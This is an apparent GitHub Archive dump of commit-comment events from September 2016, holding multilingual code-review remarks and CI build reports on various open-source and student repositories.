{"id":"4509811355","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18884084,"position":null,"line":null,"path":null,"commit_id":"e0d62b5e62b572e93b55bef01d5a6616e3296333","created_at":"2016-09-02T17:42:32Z","updated_at":"2016-09-02T17:42:32Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 12](http://teamcity.otenv.com/viewLog.html?buildId=5158355&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 5, ignored: 3 Build time: 00:01:07"}},"created_at":"2016-09-02T17:42:32Z"}
{"id":"4509826756","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":18884123,"position":4,"line":35,"path":"src/main/webapp/jsp/customer.jsp","commit_id":"de45b629965e5da17f1be694dea9d02f45ba9986","created_at":"2016-09-02T17:45:39Z","updated_at":"2016-09-02T17:45:39Z","body":"Waarom heb je dit weggehaald? Dit ziet er imho toch mooier uit dan de scriptlets.."}},"created_at":"2016-09-02T17:45:39Z"}
{"id":"4509828012","type":"CommitCommentEvent","actor":{"login":"lzybkr"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":18884127,"position":null,"line":null,"path":null,"commit_id":"0bad74b790b85098a7b4575147cd6ae0ab010e12","created_at":"2016-09-02T17:45:57Z","updated_at":"2016-09-02T17:45:57Z","body":"I don't trust `git` to preserve line endings, there is a global setting to \"fix\" line endings when checking out.\r\n\r\nI think we should generate a file with the different line endings to ensure we're testing what we want."}},"created_at":"2016-09-02T17:45:57Z"}
{"id":"4509828381","type":"CommitCommentEvent","actor":{"login":"mfraezz"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":18884128,"position":5,"line":3240,"path":"website/project/model.py","commit_id":"cf68848c0cba14288104186163d1f36d532b61b1","created_at":"2016-09-02T17:46:03Z","updated_at":"2016-09-02T17:46:03Z","body":"I'll have a hotfix for this up shortly"}},"created_at":"2016-09-02T17:46:03Z"}
{"id":"4509830762","type":"CommitCommentEvent","actor":{"login":"marce0993"},"repo":{"name":"marce0993/marce0993.github.io"},"payload":{"comment":{"id":18884139,"position":null,"line":null,"path":null,"commit_id":"083e2c31d4bfdc2d66400ae95acebb05b0ed4964","created_at":"2016-09-02T17:46:34Z","updated_at":"2016-09-02T17:46:34Z","body":"que es lo que pasa?"}},"created_at":"2016-09-02T17:46:34Z"}
{"id":"4509831714","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18884145,"position":21,"line":21,"path":"lesson4/main.rb","commit_id":"4a62868fca1a8b79866dc669951b669c79a28a60","created_at":"2016-09-02T17:46:45Z","updated_at":"2016-09-02T17:46:45Z","body":"Правильно будет choi**s**e"}},"created_at":"2016-09-02T17:46:45Z"}
{"id":"4509831741","type":"CommitCommentEvent","actor":{"login":"aronhelser"},"repo":{"name":"Kitware/paraviewweb"},"payload":{"comment":{"id":18884146,"position":null,"line":null,"path":null,"commit_id":"9d57ef786892654562a4017ae51ca5085b11fc1c","created_at":"2016-09-02T17:46:45Z","updated_at":"2016-09-02T17:46:45Z","body":"Cool - I couldn't figure out where this was happening with a brief look. Glad you got to it."}},"created_at":"2016-09-02T17:46:45Z"}
{"id":"4509835241","type":"CommitCommentEvent","actor":{"login":"iangcarroll"},"repo":{"name":"Slurppa/cscan"},"payload":{"comment":{"id":18884154,"position":24,"line":24,"path":"CScan/Components/HiJackThis/O3.cs","commit_id":"cfe100ac1a340c119146717ee43587a5610cef37","created_at":"2016-09-02T17:47:26Z","updated_at":"2016-09-02T17:47:26Z","body":"I think you meant O3, not 03. The token field will have a colon added to it automatically as well."}},"created_at":"2016-09-02T17:47:26Z"}
{"id":"4509835469","type":"CommitCommentEvent","actor":{"login":"MarkY-LunarG"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18884155,"position":null,"line":null,"path":null,"commit_id":"806a9ad302df9bf595fc3debf57385e04934ef39","created_at":"2016-09-02T17:47:28Z","updated_at":"2016-09-02T17:47:28Z","body":"\"loader_instance_heap_alloc\"\r\n   The NULL pointer and size += 0 changes were all debug code.  Removed.\r\n\r\n\"Why did loader_make_version change?\"\r\n   To match all the other code performing this same function.  I'll move it to a separate commit.\r\n\r\n\"Changes to loader_init_generic_list\"\r\n   Moved to another commit."}},"created_at":"2016-09-02T17:47:28Z"}
{"id":"4509837218","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18884160,"position":104,"line":104,"path":"lesson4/main.rb","commit_id":"4a62868fca1a8b79866dc669951b669c79a28a60","created_at":"2016-09-02T17:47:52Z","updated_at":"2016-09-02T17:47:52Z","body":"Нужно ниже, уже после опредления класса создать объект Menu и вызывать у него метод menu_choice. А затем файл запускать через ruby, а не через irb. Первый пункт меню работает как надо, я проверил, второй - нет, дальше пока не проверял"}},"created_at":"2016-09-02T17:47:52Z"}
{"id":"4509838930","type":"CommitCommentEvent","actor":{"login":"iangcarroll"},"repo":{"name":"Slurppa/cscan"},"payload":{"comment":{"id":18884165,"position":5,"line":12,"path":"CScan/CScan.csproj","commit_id":"cfe100ac1a340c119146717ee43587a5610cef37","created_at":"2016-09-02T17:48:12Z","updated_at":"2016-09-02T17:48:12Z","body":"Can you undo targeting it to 4.6.1? You may need to update Visual Studio or install the 4.6.2 version for Visual Studio."}},"created_at":"2016-09-02T17:48:12Z"}
{"id":"4509839164","type":"CommitCommentEvent","actor":{"login":"frangarcj"},"repo":{"name":"frangarcj/psplib4vita"},"payload":{"comment":{"id":18884166,"position":null,"line":null,"path":null,"commit_id":"fd31947359feb39806ccfab0b8b2c1048a4258ef","created_at":"2016-09-02T17:48:14Z","updated_at":"2016-09-02T17:48:14Z","body":"#3 "}},"created_at":"2016-09-02T17:48:14Z"}
{"id":"4509843064","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18884183,"position":32,"line":32,"path":"lesson4/train.rb","commit_id":"4a62868fca1a8b79866dc669951b669c79a28a60","created_at":"2016-09-02T17:48:59Z","updated_at":"2016-09-02T17:48:59Z","body":"У id_train нет свойства type, оно есть у самого объекта Train, т.е. у self"}},"created_at":"2016-09-02T17:48:59Z"}
{"id":"4509847347","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":18884199,"position":47,"line":47,"path":"src/main/java/nl/cerios/cerioscoop/web/IndexServlet.java","commit_id":"c150ca65386b9f80c2ec9e6d5a4f75b5e9aece9b","created_at":"2016-09-02T17:49:53Z","updated_at":"2016-09-02T17:49:53Z","body":"Deze logica zou je ook kunnen doen in de volgende layer (de service layer dus, in plaats van de servlet). Hij kan zelfs helemaal worden doorgedrukt naar de database layer (je krijgt dan uiteindelijk een sql query als \"Select * from .. where data > current date\" of zoiets). Hoe dichter dit soort logica bij de database, hoe efficienter het systeem het kan verwerken."}},"created_at":"2016-09-02T17:49:53Z"}
{"id":"4509855497","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"SmithersAssistant/smithers"},"payload":{"comment":{"id":18884220,"position":null,"line":null,"path":null,"commit_id":"0732fed616d64ff4696110574e51c300cd409d4c","created_at":"2016-09-02T17:51:35Z","updated_at":"2016-09-02T17:51:35Z","body":"❤️ "}},"created_at":"2016-09-02T17:51:35Z"}
{"id":"4509856592","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":18884222,"position":51,"line":51,"path":"src/main/java/nl/cerios/cerioscoop/web/IndexServlet.java","commit_id":"c150ca65386b9f80c2ec9e6d5a4f75b5e9aece9b","created_at":"2016-09-02T17:51:50Z","updated_at":"2016-09-02T17:51:50Z","body":"Waarom haal je hier de Movie nog een keer op 1 voor 1 op? Je had ook al een keer alle movies in zijn geheel opgehaald. Zo wordt het wel erg inefficient. Probeer het 's in een sequence diagram te tekenen anders."}},"created_at":"2016-09-02T17:51:50Z"}
{"id":"4509857985","type":"CommitCommentEvent","actor":{"login":"lexelby"},"repo":{"name":"heroku/retrodot"},"payload":{"comment":{"id":18884225,"position":34,"line":42,"path":"spec/lib/incident_response_spec.rb","commit_id":"2e98f44b5f054c3e9ad18dfda9a65032f7a4117f","created_at":"2016-09-02T17:52:08Z","updated_at":"2016-09-02T17:52:08Z","body":"In short: because there is no Config.max_words_in_name anymore (oops, need to remove this from `config.rb`, will do shortly).\r\n\r\nPreviously I was splitting the message into words and considering them in sequential groups to see if they are names.  Now I just match whole names with regexes, so `Config.max_words_in_name` is no longer necessary and we don't need to test it."}},"created_at":"2016-09-02T17:52:08Z"}
{"id":"4509865015","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":18884264,"position":59,"line":59,"path":"src/main/java/nl/cerios/cerioscoop/web/IndexServlet.java","commit_id":"c150ca65386b9f80c2ec9e6d5a4f75b5e9aece9b","created_at":"2016-09-02T17:53:37Z","updated_at":"2016-09-02T17:53:37Z","body":"Ik snap niks van deze loop:(  Waarom zou je elke movie apart als een request attribute willen opslaan? Je kunt de hele lijst toch gewoon in een request attribute opslaan?"}},"created_at":"2016-09-02T17:53:37Z"}
{"id":"4509865250","type":"CommitCommentEvent","actor":{"login":"thebwt"},"repo":{"name":"tonyskapunk/kthresher"},"payload":{"comment":{"id":18884266,"position":null,"line":null,"path":null,"commit_id":"5129afb2c90a3463f5c7993d9b3607a87558b902","created_at":"2016-09-02T17:53:39Z","updated_at":"2016-09-02T17:53:39Z","body":"remember to activate the rackerlabs/kthresher repo in drone before merging this in."}},"created_at":"2016-09-02T17:53:39Z"}
{"id":"4509865991","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":18884270,"position":58,"line":58,"path":"src/main/java/nl/cerios/cerioscoop/web/IndexServlet.java","commit_id":"c150ca65386b9f80c2ec9e6d5a4f75b5e9aece9b","created_at":"2016-09-02T17:53:48Z","updated_at":"2016-09-02T17:53:48Z","body":"Deze javadoc klopt niet. toch?"}},"created_at":"2016-09-02T17:53:48Z"}
{"id":"4509867628","type":"CommitCommentEvent","actor":{"login":"lb42"},"repo":{"name":"TEIC/TEI"},"payload":{"comment":{"id":18884276,"position":null,"line":null,"path":null,"commit_id":"96ce89904d3c0a13477610697926a80e06ab85b3","created_at":"2016-09-02T17:54:09Z","updated_at":"2016-09-02T17:54:09Z","body":"Ignore misleading message for this commit: I checked in the wrong file. "}},"created_at":"2016-09-02T17:54:09Z"}
{"id":"4509869457","type":"CommitCommentEvent","actor":{"login":"dabrahams"},"repo":{"name":"mystor/icecc-osx-moztor"},"payload":{"comment":{"id":18884281,"position":null,"line":null,"path":null,"commit_id":"1359def1474462503e927947f66c9bfba5974b72","created_at":"2016-09-02T17:54:32Z","updated_at":"2016-09-02T17:54:32Z","body":"I'm really happy someone has blazed a trail by trying to do this on Macs, but I'd like to build icemon from source rather than trusting a downloaded binary.  Did you have to do anything special to build it?  How about posting the instructions along with everything else?\r\n\r\nThanks!"}},"created_at":"2016-09-02T17:54:32Z"}
{"id":"4509870142","type":"CommitCommentEvent","actor":{"login":"lexelby"},"repo":{"name":"heroku/retrodot"},"payload":{"comment":{"id":18884283,"position":81,"line":42,"path":"lib/incident_response.rb","commit_id":"2e98f44b5f054c3e9ad18dfda9a65032f7a4117f","created_at":"2016-09-02T17:54:41Z","updated_at":"2016-09-02T17:54:41Z","body":"Nope, we can just get rid of `Config.max_words_in_name`.  It was really a hack, not a feature: it was there to tell the algorithm how long a run of words to check.  The higher the value, the longer the algorithm would take (because it'd have to consider more sets of words to see if they were names) -- so the user should set it to the lowest value possible that matches all names.  In reality I probably should have just inferred the value by finding the longest name in the DB.\r\n\r\nThis all goes away when I match entire names with the regex.  As long as names are sorted longest-first, we'll avoid a situation where a short name overshadows a long one, e.g. \"John Smith\" and \"John Smith-Jones\"."}},"created_at":"2016-09-02T17:54:41Z"}
{"id":"4509870774","type":"CommitCommentEvent","actor":{"login":"lucyking"},"repo":{"name":"lucyking/leetcode"},"payload":{"comment":{"id":18884286,"position":null,"line":null,"path":null,"commit_id":"796d9736915c2119f60d1a13cd2f5b8a9898671f","created_at":"2016-09-02T17:54:51Z","updated_at":"2016-09-02T17:54:51Z","body":"high_bit = 1<<int(math.log(x,2))"}},"created_at":"2016-09-02T17:54:51Z"}
{"id":"4509871970","type":"CommitCommentEvent","actor":{"login":"eventualbuddha"},"repo":{"name":"hiddentao/fast-levenshtein"},"payload":{"comment":{"id":18884288,"position":null,"line":null,"path":null,"commit_id":"80874a9c0cd8d9f5aee9d73aa39d9ab0a9d51435","created_at":"2016-09-02T17:55:05Z","updated_at":"2016-09-02T17:55:05Z","body":"This was never tagged, so tools like bower cannot find v1.1.4. Mind adding a tag for it?"}},"created_at":"2016-09-02T17:55:05Z"}
{"id":"4509873345","type":"CommitCommentEvent","actor":{"login":"Vidigan"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":18884293,"position":null,"line":null,"path":null,"commit_id":"565496e79809b0c6eae83bc1c9107e834d82bd4e","created_at":"2016-09-02T17:55:21Z","updated_at":"2016-09-02T17:55:21Z","body":"Posso então substituir os códigos que eu botei por 2 do RUby comparados com outros dois de qualquer outra linguagem?"}},"created_at":"2016-09-02T17:55:21Z"}
{"id":"4509876480","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18884304,"position":7,"line":15,"path":"README.md","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T17:56:02Z","updated_at":"2016-09-02T17:56:02Z","body":"https://github.com/jsaglio42/GBmu/blob/master/emulator/lib/src/constants.dart#L50"}},"created_at":"2016-09-02T17:56:02Z"}
{"id":"4509877227","type":"CommitCommentEvent","actor":{"login":"GustavoLuuz"},"repo":{"name":"Robert-Henrique/Biblioteca2.1"},"payload":{"comment":{"id":18884308,"position":null,"line":null,"path":null,"commit_id":"e86a520372ce856ea574b862c85b9f308b1fa4f3","created_at":"2016-09-02T17:56:12Z","updated_at":"2016-09-02T17:56:12Z","body":"Pruu"}},"created_at":"2016-09-02T17:56:12Z"}
{"id":"4509877927","type":"CommitCommentEvent","actor":{"login":"mteixeira87"},"repo":{"name":"mteixeira87/Hello-World"},"payload":{"comment":{"id":18884312,"position":null,"line":null,"path":null,"commit_id":"5648f9f321229a72e533b9a1d14b09d6472e6835","created_at":"2016-09-02T17:56:21Z","updated_at":"2016-09-02T17:56:21Z","body":"Hello\r\n\r\nI m new and willing to experience all advantages GitHub has to offer. Hope to be contributing to enhance this 'dont know hot to call it' platform soon(ish). Let s go o/ "}},"created_at":"2016-09-02T17:56:21Z"}
{"id":"4509880619","type":"CommitCommentEvent","actor":{"login":"mteixeira87"},"repo":{"name":"mteixeira87/Hello-World"},"payload":{"comment":{"id":18884321,"position":1,"line":1,"path":"README.md","commit_id":"5648f9f321229a72e533b9a1d14b09d6472e6835","created_at":"2016-09-02T17:56:57Z","updated_at":"2016-09-02T17:56:57Z","body":"\r\n\r\nHello\r\n\r\nI m new and willing to experience all advantages GitHub has to offer. Hope to be contributing to enhance this 'dont know hot to call it' platform soon(ish). Let s go o/\r\n[2]?"}},"created_at":"2016-09-02T17:56:57Z"}
{"id":"4509889943","type":"CommitCommentEvent","actor":{"login":"kdaveid"},"repo":{"name":"IdentityServer/IdentityServer4"},"payload":{"comment":{"id":18884345,"position":null,"line":null,"path":null,"commit_id":"a6ebaddc0e1ee02be8e5e182cee8fac0c6f2058f","created_at":"2016-09-02T17:58:56Z","updated_at":"2016-09-02T17:58:56Z","body":"Great, the UseAspNetIdentitySettings setting is exactly what I just wanted to integrate :smile: "}},"created_at":"2016-09-02T17:58:56Z"}
{"id":"4509890737","type":"CommitCommentEvent","actor":{"login":"tyarkoni"},"repo":{"name":"bambinos/bambi"},"payload":{"comment":{"id":18884348,"position":null,"line":null,"path":null,"commit_id":"1c66545131c3034edbfc6f691bb4e9858b46e288","created_at":"2016-09-02T17:59:08Z","updated_at":"2016-09-02T17:59:08Z","body":"Good catch, thanks!"}},"created_at":"2016-09-02T17:59:08Z"}
{"id":"4509890773","type":"CommitCommentEvent","actor":{"login":"wiiaboo"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":18884349,"position":null,"line":null,"path":null,"commit_id":"695804f1f5b0946852e956fc81a23ee643cb1748","created_at":"2016-09-02T17:59:08Z","updated_at":"2016-09-02T17:59:08Z","body":"You need to install rst2pdf for those utils. I don't install it by default because it's only available in mingw pythons and those are problematic to use. Ideally, install Windows Python2 and then use pip to install directly or get compiled binaries from http://www.lfd.uci.edu/~gohlke/pythonlibs/ (python2 only)."}},"created_at":"2016-09-02T17:59:08Z"}
{"id":"4509905720","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18884383,"position":80,"line":80,"path":"src/utils/SparseLineGrid.h","commit_id":"ad1c442c9ad419582fb7ad56321b7751a6be0ddd","created_at":"2016-09-02T18:02:17Z","updated_at":"2016-09-02T18:02:17Z","body":"This, at least, is incorrect even if 0,0 is the lower left and all valid models are in positive coordinate space because let's say start is (4, 10) and end is (8, 6).  The x's are already in order, but y_dir will be -1 so the for loop will look like this:\r\n\r\nfor (cell_y = 10; -cell_y <= -6; cell_y -= 1)\r\n\r\nAnd it will drop out immediately.  That's because -1a <= -1b doesn't invert the comparison.  In fact, it's equivalent to a <= b.  You could do (a <= b) != (y_dir == -1), perhaps.  I'll try this and see if it also resolves my assert problem and PR if it looks good."}},"created_at":"2016-09-02T18:02:17Z"}
{"id":"4509906464","type":"CommitCommentEvent","actor":{"login":"lukechesser"},"repo":{"name":"unsplash/unsplash-php"},"payload":{"comment":{"id":18884386,"position":null,"line":null,"path":null,"commit_id":"3288f6b151297c0232d71c6c4dfa712c298b3831","created_at":"2016-09-02T18:02:27Z","updated_at":"2016-09-02T18:02:27Z","body":"Good point. cc @dechuck "}},"created_at":"2016-09-02T18:02:27Z"}
{"id":"4509907002","type":"CommitCommentEvent","actor":{"login":"mteixeira87"},"repo":{"name":"mteixeira87/Hello-World"},"payload":{"comment":{"id":18884387,"position":1,"line":1,"path":"README.md","commit_id":"5648f9f321229a72e533b9a1d14b09d6472e6835","created_at":"2016-09-02T18:02:34Z","updated_at":"2016-09-02T18:02:34Z","body":"Bla bla bla"}},"created_at":"2016-09-02T18:02:34Z"}
{"id":"4509907290","type":"CommitCommentEvent","actor":{"login":"RichardCraven"},"repo":{"name":"RichardCraven/biobotsChallenge"},"payload":{"comment":{"id":18884389,"position":3,"line":3,"path":"README.md","commit_id":"ac986bd51c4127df6f0f5214ba753820c9ee7682","created_at":"2016-09-02T18:02:38Z","updated_at":"2016-09-02T18:02:38Z","body":"To sort by table headings, just click the heading. (ex: clicking the Elasticity heading\r\nwill sort the table from lowest elasticity value to highest. Clicking it again will flip the order)"}},"created_at":"2016-09-02T18:02:38Z"}
{"id":"4509910633","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18884401,"position":null,"line":null,"path":null,"commit_id":"f6395ecd09e8f982df4f039b61393cc60dc6e56c","created_at":"2016-09-02T18:03:22Z","updated_at":"2016-09-02T18:03:22Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1564 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.81%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-64.13%25-red.svg)</a>\n"}},"created_at":"2016-09-02T18:03:22Z"}
{"id":"4509912180","type":"CommitCommentEvent","actor":{"login":"fidley"},"repo":{"name":"ivanfemia/abap2xlsx"},"payload":{"comment":{"id":18884406,"position":null,"line":null,"path":null,"commit_id":"5251e4a4ae7cfc4a89685915c5149970638343cc","created_at":"2016-09-02T18:03:43Z","updated_at":"2016-09-02T18:03:43Z","body":"Hi Alessandro,\n\nSure, I will update it in next days.\n\nCheers\nLukasz"}},"created_at":"2016-09-02T18:03:43Z"}
{"id":"4509915154","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884410,"position":4,"line":30,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:04:21Z","updated_at":"2016-09-02T18:04:21Z","body":"_Aleo_ have to be disabled, as none of the templates rely on it just yet."}},"created_at":"2016-09-02T18:04:21Z"}
{"id":"4509922078","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18884431,"position":null,"line":null,"path":null,"commit_id":"49dd520555c18d68b4f11c4c29b5c07849095452","created_at":"2016-09-02T18:05:49Z","updated_at":"2016-09-02T18:05:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GiW7oEQ0TlSMYrvzDHhzVA"}},"created_at":"2016-09-02T18:05:49Z"}
{"id":"4509922914","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884433,"position":13,"line":66,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:06:00Z","updated_at":"2016-09-02T18:06:00Z","body":"Padding for `breadcrumbs` should follow other templates to stay consistent."}},"created_at":"2016-09-02T18:06:00Z"}
{"id":"4509926131","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884441,"position":22,"line":80,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:06:42Z","updated_at":"2016-09-02T18:06:42Z","body":"As with `breadcrumbs`, `page--hero` should also use the same classes as in other templates."}},"created_at":"2016-09-02T18:06:42Z"}
{"id":"4509929920","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884450,"position":23,"line":81,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:07:33Z","updated_at":"2016-09-02T18:07:33Z","body":"Instead of `h--headline` we should stick to applying smaller classes, in this case just `font-size` is needed."}},"created_at":"2016-09-02T18:07:33Z"}
{"id":"4509930421","type":"CommitCommentEvent","actor":{"login":"basudhamisra"},"repo":{"name":"basudhamisra/understanding-git-github"},"payload":{"comment":{"id":18884452,"position":null,"line":null,"path":null,"commit_id":"e21c36dcf3a0bdd98ffee8e3799d4b7edad9a05f","created_at":"2016-09-02T18:07:40Z","updated_at":"2016-09-02T18:07:40Z","body":"[basicgit.txt](https://github.com/basudhamisra/understanding-git-github/files/452650/basicgit.txt)\r\n"}},"created_at":"2016-09-02T18:07:40Z"}
{"id":"4509937777","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884467,"position":30,"line":86,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:09:16Z","updated_at":"2016-09-02T18:09:16Z","body":"Padding on the wrapper is a bit unnecessary, and could be dropped, as we can apply proper padding on individual panel wrappers later. See https://github.com/matthewmorek/wfp-jpo-country/commit/7a2154da5b1d77c021e54b781039b17b3f8775f6#diff-eacf331f0ffc35d4b482f1d15a887d3bR97."}},"created_at":"2016-09-02T18:09:16Z"}
{"id":"4509938798","type":"CommitCommentEvent","actor":{"login":"GICodeWarrior"},"repo":{"name":"gitlabhq/gitlabhq"},"payload":{"comment":{"id":18884468,"position":6,"line":187,"path":"app/helpers/blob_helper.rb","commit_id":"28726729452ef64270534806e75a9595ea1a659d","created_at":"2016-09-02T18:09:29Z","updated_at":"2016-09-02T18:09:29Z","body":"This doesn't appear to work.  Passing ?issuable_template=blah or ?issuable_template[name]=blah to the new issue form isn't doing anything.  This might be because templates is an array of hashes rather than just strings."}},"created_at":"2016-09-02T18:09:29Z"}
{"id":"4509939336","type":"CommitCommentEvent","actor":{"login":"basudhamisra"},"repo":{"name":"basudhamisra/understanding-git-github"},"payload":{"comment":{"id":18884472,"position":null,"line":null,"path":null,"commit_id":"e21c36dcf3a0bdd98ffee8e3799d4b7edad9a05f","created_at":"2016-09-02T18:09:36Z","updated_at":"2016-09-02T18:09:36Z","body":"Just a simple line is added in Github editor itself."}},"created_at":"2016-09-02T18:09:36Z"}
{"id":"4509945052","type":"CommitCommentEvent","actor":{"login":"Gh14Cc10"},"repo":{"name":"ivanfemia/abap2xlsx"},"payload":{"comment":{"id":18884491,"position":null,"line":null,"path":null,"commit_id":"5251e4a4ae7cfc4a89685915c5149970638343cc","created_at":"2016-09-02T18:10:51Z","updated_at":"2016-09-02T18:10:51Z","body":"Thank you Lukasz! Hope to see you in Barcelona again!\n\nIl venerdì 2 settembre 2016, Łukasz Pęgiel <notifications@github.com> ha\nscritto:\n\n> Hi Alessandro,\n>\n> Sure, I will update it in next days.\n>\n> Cheers\n> Lukasz\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ivanfemia/abap2xlsx/commit/5251e4a4ae7cfc4a89685915c5149970638343cc#commitcomment-18884406>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGCy9iH3LdgH6hNejNfIbwvJOoIbhSncks5qmGUAgaJpZM4JzxOJ>\n> .\n>\n\n\n-- \n\n*Alessandro Iannacci *| SAP Mentor & SAP Senior Consultant\n\nMobile: +39 345 7311228 | alessandro.iannacci@techedgegroup.com\n<alessandro.iannacci@techedge.it>\n\n\n\n*Techedge Group* | http://www.techedgegroup.com\n\n___________________________________\n\nMessage for the intended recipient only. If received in error, please\ncontact the sender and read http://www.techedgegroup.com/disclaimer/\n"}},"created_at":"2016-09-02T18:10:51Z"}
{"id":"4509947709","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18884506,"position":4,"line":89,"path":"modules/common/src/main/Steroids.scala","commit_id":"5c24d763c6d0fc0a08bfd6564fb0073e6466bec2","created_at":"2016-09-02T18:11:26Z","updated_at":"2016-09-02T18:11:26Z","body":"@ornicar Value class ?\r\n\r\n```scala\r\nimplicit final class LilaPimpedInt(val self: Int) extends AnyVal {\r\n  def atLeast(bottomValue: Int): Int = self max bottomValue\r\n  def atMost(topValue: Int): Int = self min topValue\r\n}\r\n```"}},"created_at":"2016-09-02T18:11:26Z"}
{"id":"4509949412","type":"CommitCommentEvent","actor":{"login":"chuanxd"},"repo":{"name":"huei90/blog"},"payload":{"comment":{"id":18884510,"position":null,"line":null,"path":null,"commit_id":"3d77b9bfbf9e644df6f007a0f895aa115b81a428","created_at":"2016-09-02T18:11:49Z","updated_at":"2016-09-02T18:11:49Z","body":":+1:"}},"created_at":"2016-09-02T18:11:49Z"}
{"id":"4509951346","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884515,"position":33,"line":88,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:12:17Z","updated_at":"2016-09-02T18:12:17Z","body":"In order to maintain consistency and appropriate container dimensions, we can reset `padding-left` when the viewport goes beyond main container's `max-width`."}},"created_at":"2016-09-02T18:12:17Z"}
{"id":"4509952800","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884519,"position":23,"line":81,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:12:36Z","updated_at":"2016-09-02T18:12:36Z","body":"`fs1` for a `h1` ? \r\n\r\nWhat cases do we use `h--headline` ? In an `article` `h2` ?"}},"created_at":"2016-09-02T18:12:36Z"}
